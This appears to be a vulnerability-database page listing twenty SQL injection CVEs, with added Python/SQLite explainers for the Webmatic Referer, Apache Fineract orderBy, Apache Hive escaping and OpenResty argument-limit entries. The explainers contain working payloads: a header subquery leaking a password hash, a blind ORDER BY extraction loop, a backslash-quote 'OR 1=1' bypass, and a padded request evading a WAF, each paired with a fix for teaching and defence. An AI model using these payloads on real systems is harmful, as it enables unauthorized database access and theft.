Total: 9311 CVE entries. The 20 shown below are ordered by last update, newest first.
CVE | Vendor | Product | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2012-3350 | Valarsoft | Webmatic | 2018-05-29 | 6.8 MEDIUM | N/A | SQL injection vulnerability in index.php in Webmatic 3.1.1 allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header.
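The Webmatic entry is the only one on this page where the injection source is an HTTP request header rather than a form field or query-string parameter, and headers are often logged without the scrutiny given to form input. The following is an added example written for this page, not Webmatic's code: a Python visit logger over an in-memory SQLite database that splices the Referer value into an INSERT, the header value an attacker would send to copy a column from another table into the log, and the bound-parameter version that stores the same header as inert text. The table and column names and the sample rows are constructed assumptions; the page does not describe Webmatic's schema. The same fix applies to every "via the X parameter" entry below.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a visits log plus a users table holding a
    value the attacker should never see. Names are assumptions for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$adminhash');
        CREATE TABLE visits (id INTEGER PRIMARY KEY, referer TEXT, page TEXT);
        """
    )
    return conn


def log_visit_vulnerable(conn, referer: str, page: str = "index.php") -> None:
    """The header value is spliced into the statement text. This mirrors the
    class of bug in CVE-2012-3350 (Referer reaching SQL unescaped)."""
    conn.execute(f"INSERT INTO visits (referer, page) VALUES ('{referer}', '{page}')")


def log_visit_fixed(conn, referer: str, page: str = "index.php") -> None:
    """Bound parameters: the driver passes the header as data, never as SQL."""
    conn.execute("INSERT INTO visits (referer, page) VALUES (?, ?)", (referer, page))


# Constructed attacker header: the quote closes the literal, the scalar
# subquery fills the second column from another table, and the trailing
# comment discards the rest of the original statement.
EVIL_REFERER = "http://x/', (SELECT password_hash FROM users WHERE name='admin')) -- "


def stored_pages(conn) -> list:
    return [row[0] for row in conn.execute("SELECT page FROM visits")]


def stored_referers(conn) -> list:
    return [row[0] for row in conn.execute("SELECT referer FROM visits")]


def demo_vulnerable() -> list:
    """Returns the 'page' column after one request with the hostile header."""
    conn = make_db()
    log_visit_vulnerable(conn, EVIL_REFERER)
    return stored_pages(conn)          # ['$2y$10$adminhash']


def demo_fixed() -> list:
    conn = make_db()
    log_visit_fixed(conn, EVIL_REFERER)
    return stored_pages(conn)          # ['index.php']


def demo_fixed_keeps_header_verbatim() -> bool:
    conn = make_db()
    log_visit_fixed(conn, EVIL_REFERER)
    return stored_referers(conn) == [EVIL_REFERER]


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("fixed:     ", demo_fixed())
```

Over HTTP the same header is sent with curl's -H option, and the leaked value then appears wherever the application displays its visit log. Note that the hostile header never needs stacked statements or a second request; a scalar subquery inside VALUES is enough.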
CVE | Vendor | Product | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2018-9245 | Ericssonlg | Ipecs Nms | 2018-05-25 | 10.0 HIGH | 9.8 CRITICAL | The Ericsson-LG iPECS NMS A.1Ac login portal has a SQL injection vulnerability in the User ID and password fields that allows attackers to bypass the login page and execute arbitrary code on the underlying operating system.
CVE-2018-9102 | Mitel | Mivoice Connect, St 14.2 | 2018-05-25 | 4.3 MEDIUM | 6.5 MEDIUM | A vulnerability in the conferencing component of Mitel MiVoice Connect, versions R1707-PREM SP1 (21.84.5535.0) and earlier, and Mitel ST 14.2, versions GA27 (19.49.5200.0) and earlier, could allow an unauthenticated attacker to conduct a SQL injection attack due to insufficient input validation in the signin interface. A successful exploit could allow the attacker to extract sensitive information from the database.
CVE-2017-1722 | Ibm | Qradar Security Information And Event Manager | 2018-05-25 | 6.5 MEDIUM | 6.3 MEDIUM | IBM Security QRadar SIEM 7.2 and 7.3 are vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 134811.
CVE-2017-17902 | Kliqqi | Kliqqi Cms | 2018-05-24 | 7.5 HIGH | 9.8 CRITICAL | SQL injection exists in Kliqqi CMS 3.5.2 via the randkey parameter when submitting a new story at the pligg/story.php?title= URI.
CVE-2018-1292 | Apache | Fineract | 2018-05-22 | 5.5 MEDIUM | 8.1 HIGH | In the 'getReportType' method of Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating and 0.4.0-incubating, an attacker can inject SQL via the 'reportName' parameter to read or update data they are not authorized to access.
CVE-2018-1291 | Apache | Fineract | 2018-05-22 | 5.5 MEDIUM | 8.1 HIGH | Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating and 0.4.0-incubating expose REST endpoints that query domain-specific entities with a query parameter 'orderBy' that is appended directly to SQL statements. An attacker can craft the 'orderBy' value, supplied through the "order" parameter, to read or update data they are not authorized to access.
CVE-2018-1290 | Apache | Fineract | 2018-05-22 | 7.5 HIGH | 9.8 CRITICAL | In Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating and 0.4.0-incubating, a single-quote escape spanning two consecutive SQL parameters can cause SQL injection, for example in methods such as retrieveAuditEntries of the AuditsApiResource class and retrieveCommands of the MakercheckersApiResource class.
CVE-2018-1289 | Apache | Fineract | 2018-05-22 | 6.5 MEDIUM | 8.8 HIGH | Apache Fineract 1.0.0, 0.6.0-incubating, 0.5.0-incubating and 0.4.0-incubating expose REST endpoints that query domain-specific entities with query parameters 'orderBy' and 'sortOrder' that are appended directly to SQL statements. An attacker can craft the 'orderBy' and 'sortOrder' values to read or update data they are not authorized to access.
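The Fineract orderBy/sortOrder entries (CVE-2018-1289 and CVE-2018-1291) share one mechanism worth seeing in code: sort column and direction are SQL identifiers, which a prepared statement cannot bind, so the endpoints appended the raw query parameters to the statement text. The following is an added Python/SQLite example written for this page; it is not Fineract's code, and the accounts table, its columns and the sample rows are constructed assumptions. It shows why "read data for which he doesn't have authorization" follows from an ORDER BY injection even though the row filter is bound: the order in which the attacker's own rows come back depends on a CASE expression that compares a character of another tenant's secret, which is a blind oracle good for one character per request. The fix is the standard one, an allowlist that maps external sort names to column names and directions.

```python
import sqlite3

ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def make_db() -> sqlite3.Connection:
    """Constructed data: 'alice' (the attacker) owns two accounts and may only
    list her own; 'bob' holds a secret she is not authorized to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, label TEXT, secret TEXT);
        INSERT INTO accounts VALUES (1, 'alice', 'savings', 'a1');
        INSERT INTO accounts VALUES (2, 'alice', 'current', 'a2');
        INSERT INTO accounts VALUES (3, 'bob',   'escrow',  'K7');
        """
    )
    return conn


def list_accounts_vulnerable(conn, owner: str, order_by: str, sort_order: str) -> list:
    """The pattern the Fineract entries describe: the row filter is bound, but
    ORDER BY identifiers cannot be, so orderBy/sortOrder are appended as text."""
    sql = f"SELECT id, label FROM accounts WHERE owner = ? ORDER BY {order_by} {sort_order}"
    return [row[0] for row in conn.execute(sql, (owner,))]


def oracle_order_by(position: int, guess: str) -> str:
    """Injected orderBy value. The CASE sorts alice's rows by id when the guess
    for one character of bob's secret is right and by -id when it is wrong, so
    the order of rows she is allowed to see leaks one bit per request."""
    return (
        "(CASE WHEN (SELECT substr(secret, %d, 1) FROM accounts WHERE owner = 'bob') = '%s' "
        "THEN id ELSE -id END)" % (position, guess)
    )


def extract_secret(conn, max_len: int = 16) -> str:
    """Blind extraction of bob's secret through the vulnerable listing only."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            if list_accounts_vulnerable(conn, "alice", oracle_order_by(pos, ch), "ASC") == [1, 2]:
                recovered += ch
                break
        else:
            break  # no character matched: end of the secret
    return recovered


# Fix: map external sort names to columns and directions; anything else is an error.
SORTABLE_COLUMNS = {"id": "id", "label": "label"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_accounts_fixed(conn, owner: str, order_by: str, sort_order: str) -> list:
    column = SORTABLE_COLUMNS.get(order_by)
    direction = DIRECTIONS.get(sort_order.lower())
    if column is None or direction is None:
        raise ValueError("unsupported orderBy/sortOrder")
    sql = f"SELECT id, label FROM accounts WHERE owner = ? ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql, (owner,))]


def fixed_rejects_injection(conn) -> bool:
    try:
        list_accounts_fixed(conn, "alice", oracle_order_by(1, "K"), "ASC")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked secret:", extract_secret(db))                              # K7
    print("fixed rejects:", fixed_rejects_injection(db))                     # True
    print("fixed desc:   ", list_accounts_fixed(db, "alice", "id", "desc"))  # [2, 1]
```

Two points a reviewer should carry away: a bound WHERE clause does not make the statement safe when any other clause is built from strings, and "validate it looks like a column name" is weaker than the allowlist above because a regex that admits parentheses or dots admits the CASE expression too.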
CVE | Vendor | Product | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2018-8953 | Ca | Workload Automation Ae | 2018-05-17 | 6.5 MEDIUM | 8.8 HIGH | CA Workload Automation AE before r11.3.6 SP7 allows remote attackers to perform SQL injection via a crafted HTTP request.
CVE-2018-10225 | Thinkphp | Thinkphp | 2018-05-17 | 7.5 HIGH | 9.8 CRITICAL | ThinkPHP 3.1.3 has SQL injection via the index.php s parameter.
CVE-2018-0530 | Cybozu | Garoon | 2018-05-17 | 6.5 MEDIUM | 8.8 HIGH | SQL injection vulnerability in Cybozu Garoon 3.5.0 through 4.2.6 allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors.
CVE-2017-9839 | Dolibarr | Dolibarr Erp/crm | 2018-05-16 | 6.5 MEDIUM | 8.8 HIGH | Dolibarr ERP/CRM before 5.0.4 is affected by SQL injection via the type parameter of product/stats/card.php.
CVE-2017-18260 | Dolibarr | Dolibarr Erp/crm | 2018-05-16 | 6.5 MEDIUM | 8.8 HIGH | Dolibarr ERP/CRM through 7.0.0 is affected by multiple SQL injection vulnerabilities via the viewstatut parameter or the propal_statut parameter (aka search_statut) of comm/propal/list.php.
CVE-2018-1282 | Apache | Hive | 2018-05-15 | 7.5 HIGH | 9.1 CRITICAL | The Apache Hive JDBC driver 0.7.1 through 2.3.2 allows carefully crafted arguments to bypass the argument escaping/cleanup that the driver performs in its PreparedStatement implementation.
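The Hive entry is different in kind from the rest of the page: the application did use a PreparedStatement, but the driver implemented it by escaping the parameters and splicing them into the SQL text on the client side, so the statement was only as safe as that escaping. The following is an added Python example written for this page to illustrate that class of bug; it is not the Hive driver's code, and the payload is constructed (the page does not say which input actually bypassed the driver). It contains a quote-only escaper, a backslash-aware escaper, a placeholder substituter, and a small tokenizer that reads single-quoted literals the way a backslash-escaping dialect such as HiveQL or MySQL does, so the effect of each escaper on what the server sees as SQL versus data can be compared directly.

```python
TEMPLATE = "SELECT * FROM users WHERE name = ? AND role = ?"

# Constructed payload: a backslash followed by a quote. A quote-only escaper
# turns \' into \\' which a backslash-escaping dialect reads as an escaped
# backslash followed by an unescaped, and therefore closing, quote.
PAYLOAD = "\\' OR 1=1 -- "


def escape_quotes_only(value: str) -> str:
    """Naive: escapes the quote but leaves the escape character alone."""
    return value.replace("'", "\\'")


def escape_quotes_and_backslashes(value: str) -> str:
    """Escape the escape character first, then the quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def substitute(template: str, params: list, escape) -> str:
    """Client-side substitution: each ? becomes a quoted, escaped parameter.
    This models the design the Hive entry describes, not the driver's code."""
    out, values = [], iter(params)
    for ch in template:
        out.append("'" + escape(next(values)) + "'" if ch == "?" else ch)
    return "".join(out)


def tokenize(sql: str):
    """Split a statement the way a backslash-escaping dialect (HiveQL, MySQL)
    would: returns (contents of each string literal, SQL text outside literals).
    Inside a literal a backslash escapes the next character; a -- outside a
    literal starts a comment that runs to end of line."""
    literals, code, i, n = [], [], 0, len(sql)
    while i < n:
        if sql[i] == "'":
            i += 1
            buf = []
            while i < n and sql[i] != "'":
                if sql[i] == "\\" and i + 1 < n:
                    buf.append(sql[i + 1])
                    i += 2
                else:
                    buf.append(sql[i])
                    i += 1
            literals.append("".join(buf))
            i += 1  # closing quote
        elif sql.startswith("--", i):
            end = sql.find("\n", i)
            i = n if end == -1 else end + 1
        else:
            code.append(sql[i])
            i += 1
    return literals, "".join(code)


def code_seen_by_server(escape) -> str:
    """SQL syntax the server would execute for the constructed payload."""
    return tokenize(substitute(TEMPLATE, [PAYLOAD, "user"], escape))[1]


def literals_seen_by_server(escape) -> list:
    """String data the server would bind for the constructed payload."""
    return tokenize(substitute(TEMPLATE, [PAYLOAD, "user"], escape))[0]


if __name__ == "__main__":
    print(substitute(TEMPLATE, [PAYLOAD, "user"], escape_quotes_only))
    print("naive code :", code_seen_by_server(escape_quotes_only))
    print(substitute(TEMPLATE, [PAYLOAD, "user"], escape_quotes_and_backslashes))
    print("fixed data :", literals_seen_by_server(escape_quotes_and_backslashes))
```

With the naive escaper the server's view of the statement ends up containing OR 1=1 outside any literal and the remainder of the query disappears into the comment; with both characters escaped the whole payload survives as the data it was meant to be. The escaper must match the server's lexer exactly (SQLite, for instance, doubles quotes and gives backslash no meaning), which is why server-side parameter binding is the remedy and client-side escaping only a stopgap.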
CVE | Vendor | Product | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2018-9230 | Openresty | Openresty | 2018-05-15 | 7.5 HIGH | 9.8 CRITICAL | ** DISPUTED ** In OpenResty through 1.13.6.1, URI parameters are obtained using the ngx.req.get_uri_args and ngx.req.get_post_args functions, which ignore parameters beyond the hundredth one; this might allow remote attackers to bypass intended access restrictions or interfere with certain Web Application Firewall (ngx_lua_waf or X-WAF) products. NOTE: the vendor has reported that 100 parameters is an intentional default setting that is adjustable within the API. The vendor's position is that a security-relevant misuse of the API by a WAF product is a vulnerability in the WAF product, not in OpenResty.
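The OpenResty dispute is not about SQL at all but about a parser mismatch: a WAF written in Lua inspects whatever ngx.req.get_uri_args returns, which by default stops after 100 arguments, while the upstream application parses every argument. Anything in argument 101 reaches the backend uninspected. The following is an added Python model of that mismatch written for this page; it is not lua-nginx-module's code nor either WAF's. It emulates the documented behaviour of the argument parser (a 100-argument default, max_args=0 for no limit), uses a deliberately small signature rule as a stand-in for a WAF rule set, builds a constructed request with 100 filler parameters ahead of a SQL payload, and shows the two ways a WAF author can close the gap.

```python
import re
from urllib.parse import parse_qsl, quote


def get_args_limited(query: str, max_args: int = 100) -> dict:
    """Model of ngx.req.get_uri_args: at most max_args name=value pairs are
    parsed (100 by default) and the rest are silently dropped; 0 means no
    limit. Values are kept as lists so repeated names are not lost. This is an
    emulation for the demo, not lua-nginx-module's implementation."""
    args: dict = {}
    for count, (name, value) in enumerate(parse_qsl(query, keep_blank_values=True)):
        if max_args and count >= max_args:
            break
        args.setdefault(name, []).append(value)
    return args


# Deliberately small signature standing in for a WAF rule set (assumption).
SQLI_PATTERN = re.compile(r"(union\s+select|'\s*or\s+\d+\s*=\s*\d+|--)", re.IGNORECASE)


def waf_blocks(args: dict) -> bool:
    return any(SQLI_PATTERN.search(v) for values in args.values() for v in values)


def backend_value(query: str, name: str):
    """The upstream application parses every parameter (no limit) and, like
    PHP, keeps the last value for a repeated name."""
    return get_args_limited(query, max_args=0).get(name, [None])[-1]


PAYLOAD = "1' UNION SELECT username, password FROM users -- "


def build_padded_query(filler: int = 100) -> str:
    """Constructed attacker request: `filler` junk pairs ahead of the real one,
    so the payload arrives as argument number filler+1."""
    junk = "&".join(f"p{i}=x" for i in range(filler))
    return f"{junk}&id={quote(PAYLOAD)}"


def waf_with_default_limit_blocks(query: str) -> bool:
    """WAF calls the parser with the default limit: it never sees argument 101."""
    return waf_blocks(get_args_limited(query, max_args=100))


def waf_unlimited_blocks(query: str) -> bool:
    """Fix 1: inspect every argument (max_args=0)."""
    return waf_blocks(get_args_limited(query, max_args=0))


def waf_fail_closed_blocks(query: str, max_args: int = 100) -> bool:
    """Fix 2: keep the parsing limit (it bounds CPU and memory per request) but
    refuse requests carrying more pairs than the WAF is willing to inspect.
    Counting raw '&' is a fair estimate of pair count because a literal '&'
    inside a value has to be percent-encoded."""
    pairs = query.count("&") + 1 if query else 0
    if pairs > max_args:
        return True
    return waf_blocks(get_args_limited(query, max_args))


if __name__ == "__main__":
    q = build_padded_query()
    print("default WAF blocks:  ", waf_with_default_limit_blocks(q))    # False
    print("backend gets payload:", backend_value(q, "id") == PAYLOAD)   # True
    print("unlimited WAF blocks:", waf_unlimited_blocks(q))             # True
    print("fail-closed blocks:  ", waf_fail_closed_blocks(q))           # True
```

The vendor's position in the entry is consistent with this model: the truncation is documented and adjustable, and the defect lies in a WAF that inspects a subset of the request and then lets the whole request through. Fix 2 is usually preferable to Fix 1 for a WAF, since removing the limit hands the resource-exhaustion concern the limit exists for straight to the attacker.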
CVE | Vendor | Product | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2018-9247 | Gxlcms | Gxlcms Qy | 2018-05-09 | 7.5 HIGH | 9.8 CRITICAL | The upsql function in \Lib\Lib\Action\Admin\DataAction.class.php in Gxlcms QY v1.0.0713 allows remote attackers to execute arbitrary SQL statements via the sql parameter. Consequently, an attacker can execute arbitrary PHP code by placing it after a <?php substring and using INTO OUTFILE with a .php filename.
CVE-2018-10050 | Iscripts | Eswap | 2018-05-09 | 6.5 MEDIUM | 7.2 HIGH | iScripts eSwap v2.4 has SQL injection via the ddlFree parameter of registration_settings.php in the Admin Panel.
CVE-2016-1000118 | Huge-it | Slideshow | 2018-05-02 | 6.5 MEDIUM | 7.2 HIGH | XSS and SQL injection in Huge IT Slideshow v1.0.4.
CVE-2016-1000119 | Huge-it | Catalog | 2018-05-02 | 6.5 MEDIUM | 7.2 HIGH | SQL injection and XSS in the Huge IT Catalog extension v1.0.4 for Joomla.